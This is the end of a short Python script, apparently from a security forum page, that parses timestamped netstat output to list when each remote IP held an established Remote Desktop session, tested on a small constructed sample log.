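        if state == "ESTABLISHED":
            out[rip].append(tm)
    return dict(out)

# constructed log: two time-then-rows blocks, one joined-up line, one empty block
SAMPLE_LOG = """\
22:40
  TCP    192.168.12.28:3389     192.168.10.123:4903    ESTABLISHED
22:54 TCP 192.168.12.28:3389 192.168.12.29:1039 ESTABLISHED
23:10
  TCP    192.168.12.28:3389     192.168.10.123:4911    ESTABLISHED
  TCP    192.168.12.28:3389     192.168.10.123:4903    TIME_WAIT
23:30
"""

if __name__ == "__main__":
    for rip, times in sessions_by_source(parse_tslog(SAMPLE_LOG)).items():
        print(rip, "logged on at", ", ".join(times))
```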
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
Forum software by: NetDemon
ICP licence: 粤ICP备05087286号